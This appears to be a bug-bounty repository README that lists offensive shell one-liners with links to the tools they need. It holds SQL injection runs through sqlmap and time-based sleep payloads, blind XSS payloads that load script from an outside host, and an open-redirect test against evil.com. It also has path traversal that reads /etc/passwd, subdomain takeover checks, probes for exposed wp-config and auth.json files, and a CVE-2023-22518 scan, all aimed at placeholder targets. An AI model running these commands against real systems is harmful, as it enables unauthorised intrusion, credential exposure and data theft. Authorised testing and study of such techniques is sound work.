This Repositories contains list of One Liners with Descriptions and Installation requirements
────────────────────────────────────────────────────────────────────────
- Subfinder : https://github.com/projectdiscovery/subfinder
- GAU : https://github.com/lc/gau
- GF : https://github.com/tomnomnom/gf
- Findomain : https://github.com/Findomain/Findomain
- HTTPX : https://github.com/projectdiscovery/httpx
- Anew : https://github.com/tomnomnom/anew
- Waybackurls : https://github.com/tomnomnom/waybackurls
- SQLiDetector: https://github.com/eslam3kl/SQLiDetector
echo http://testphp.vulnweb.com | waybackurls > wayback_urls_for_target.txt ; python3 sqlidetector.py -f wayback_urls_for_target.txt
subfinder -d http://TARGET.com -silent -all | gau - blacklist ttf,woff,svg,png | sort -u | gf sqli >gf_sqli.txt; sqlmap -m gf_sqli.txt --batch --risk 3 --random-agent | tee -a sqli_report.txt
findomain -t http://testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1
cat urls.txt | grep ".php" | sed 's/\.php.*/.php\//' | sort -u | sed s/$/%27%22%60/ | while read url do ; do curl --silent "$url" | grep -qs "You have an error in your SQL syntax" && echo -e "$url \e[1;32mSQLI by Cybertix\e[0m" || echo -e "$url \e[1;31mNot Vulnerable to SQLI Injection\e[0m" ;done
cat domain.txt | httpx -silent -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(13),0))OR" -rt -timeout 20 -mrt '>13'
- apt install moreutils
- apt install parallel
cat urls.txt | grep "=" | qsreplace "1 AND (SELECT 5230 FROM (SELECT(SLEEP(10)))SUmc)" > blindsqli.txt
waybackurls https://TARGET.COM | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt
cat urls.txt | sed 's/=/=(CASE%20WHEN%20(888=888)%20THEN%20SLEEP(5)%20ELSE%20888%20END)/g' | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && time curl "'{}'"'
────────────────────────────────────────────────────────────────────────
- Waybackurls : https://github.com/tomnomnom/waybackurls
- Bhedak : https://github.com/R0X4R/bhedak
- GAU : https://github.com/lc/gau
- GF : https://github.com/tomnomnom/gf
- QS-Replace : https://github.com/tomnomnom/qsreplace
- HTTPX : https://github.com/projectdiscovery/httpx
- Subfinder : https://github.com/projectdiscovery/subfinder
- Httprobe : https://github.com/tomnomnom/httprobe
- Nuclei : https://github.com/projectdiscovery/nuclei
waybackurls TARGET.COM | grep -a -i \=http | qsreplace 'http://evil.com' | while read host do;do curl -s -L $host -I| grep "evil.com" && echo "$host \033[0;31mVulnerable\n" ;done
subfinder -dL domains.txt | httprobe |tee live_domain.txt; cat live_domain.txt | waybackurls | tee wayback.txt; cat wayback.txt | sort -u | grep "\?" > open.txt; nuclei -t Url-Redirection-Catcher.yaml -l open.txt
────────────────────────────────────────────────────────────────────────
httpx -l url.txt -path "///////../../../../../../etc/passwd" -status-code -mc 200 -ms 'root:'
────────────────────────────────────────────────────────────────────────
- Subfinder : https://github.com/projectdiscovery/subfinder
- Assetfinder : https://github.com/tomnomnom/assetfinder
- Amass : https://github.com/OWASP/Amass
- Subjack : https://github.com/haccer/subjack
subfinder -d HOST >> FILE; assetfinder --subs-only HOST >> FILE; amass enum -norecursive -noalts -d HOST >> FILE; subjack -w FILE -t 100 -timeout 30 -ssl -c $GOPATH/src/github.com/cybertix/subjack/fingerprints.json -v 3 >> takeover ;
────────────────────────────────────────────────────────────────────────
curl "https://TARGET.Com" | grep -oP '(https*.//|www\.)[^]*'
────────────────────────────────────────────────────────────────────────
- Katana : https://github.com/projectdiscovery/katana
- Dalfox : https://github.com/hahwul/dalfox
- Waybackurls : https://github.com/tomnomnom/waybackurls
- GF : https://github.com/tomnomnom/gf
- Dalfox : https://github.com/hahwul/dalfox
- HTTPX : https://github.com/projectdiscovery/httpx
echo http://testphp.vulnweb.com | katana -jc -f qurl -d 5 -c 50 -kf robotstxt,sitemapxml -silent | dalfox pipe --skip-bav
waybackurls http://testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee XSS.txt && cat XSS.txt | dalfox -b http://chirag.bxss.in pipe > output.txt
cat http://target.com | gau --subs | grep "https://" | grep -v "png\|jpg\|css\|js\|gif\|txt" | grep "=" | uro | dalfox pipe --deep-domxss --multicast --blind https://chirag.bxss.in
cat domain.txt | waybackurls | httpx -H "User-Agent: \"><script src=https://chirag.bxss.in></script>"
────────────────────────────────────────────────────────────────────────
katana -u http://testphp.vulnweb.com -js-crawl -d 5 -hl -filed endpoint | anew endpoint.txt
────────────────────────────────────────────────────────────────────────
- Subfinder : https://github.com/projectdiscovery/subfinder
- HTTPX : https://github.com/projectdiscovery/httpx
subfinder -d http://TARGET.COM -silent -all | httpx -silent -path 'api/index.php/v1/config/application?public=true' -mc 200
────────────────────────────────────────────────────────────────────────
- Subfinder : https://github.com/projectdiscovery/subfinder
- HTTPX : https://github.com/projectdiscovery/httpx
subfinder -d http://example.com -silent -all | httpx -silent -ports http:80,https:443,2082,2083 -path '/cpanelwebcall/<img%20src=x%20onerror="prompt(document.domain)">aaaaaaaaaaaaaaa' -mc 400
────────────────────────────────────────────────────────────────────────
- Subfinder : https://github.com/projectdiscovery/subfinder
- HTTPX : https://github.com/projectdiscovery/httpx
subfinder -silent -d TARGET.com | httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8088 -path "/wp-config.PHP" -mc 200 -t 60 -status-code
────────────────────────────────────────────────────────────────────────
- Gau : https://github.com/lc/gau
- HTTPX : https://github.com/projectdiscovery/httpx
- Nuclei : https://github.com/projectdiscovery/nuclei
echo TARGET.com | gau | grep ".js" | httpx -content-type | grep 'application/javascript' | awk '{print $1}' | nuclei -t /root/nuclei-templates/exposures/ -silent > secrets.txt
────────────────────────────────────────────────────────────────────────
- Shodan : https://www.shodan.io
shodan search org: "Target" http.favicon.hash:116323821 --fields ip_str,port--separator | awk '{print $1 $2}'
────────────────────────────────────────────────────────────────────────
- Waybackurls : https://github.com/tomnomnom/waybackurls
- HTTPX : https://github.com/projectdiscovery/httpx
cat subdomains.txt | waybackurls | httpx -mc 200 -ct | grep application/json
────────────────────────────────────────────────────────────────────────
- FFUF : https://github.com/ffuf/ffuf
ffuf -u https://target[.]com/FUZZ -H “Host: 127.0.0.1” -w /home/user/path/to/wordlist.txt -fs <regular_content_length>
────────────────────────────────────────────────────────────────────────
cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";done
────────────────────────────────────────────────────────────────────────
curl -s -L -k https://TARGET.COM/favicon.ico | python3 -c 'import mmh3, sys, codecs; print(mmh3.hash(codecs.encode(sys.stdin.buffer.read(),"base64")))'
────────────────────────────────────────────────────────────────────────
cat file.txt | while read host do; do curl -skL "http://$host/setup/setupadministrator.action" | grep -i "<title>Setup System Administrator" && echo $host "Vulnerable"; done
────────────────────────────────────────────────────────────────────────
subfinder -d TARGET.COM -silent | httpx -silent | nuclei -t CVE-2023-22518.yaml
────────────────────────────────────────────────────────────────────────
subfinder -d TARGET.COM | httpx -path "/auth.json" -title -status-code -content-length -t 80 -p 80,443,8080,8443,9000,9001,9002,9003
────────────────────────────────────────────────────────────────────────
xargs -a alive.txt -I@ sh -c 'gau --blacklist css,jpg,jpeg,JPEG,ott,svg,js,ttf,png,woff2,woff,eot,gif "@"' | tee -a gau.txt
────────────────────────────────────────────────────────────────────────
- BXSS : https://github.com/ethicalhackingplayground/bxss
- GAU : https://github.com/lc/gau
- Findomain : https://github.com/Findomain/Findomain
findomain -t TARGET.COM | gau | bxss -payload '"><script src=https://chirag.bxss.in></script>' -header "X-Forwarded-For"
────────────────────────────────────────────────────────────────────────
curl -s "https://www.googletagmanager.com/gtm.js?id=[TARGET-GTM-ID]" | grep -oP '"key","[a-zA-Z0-9.-]+\.[a-z]{2,}"' | awk -F'"' '{print $4}'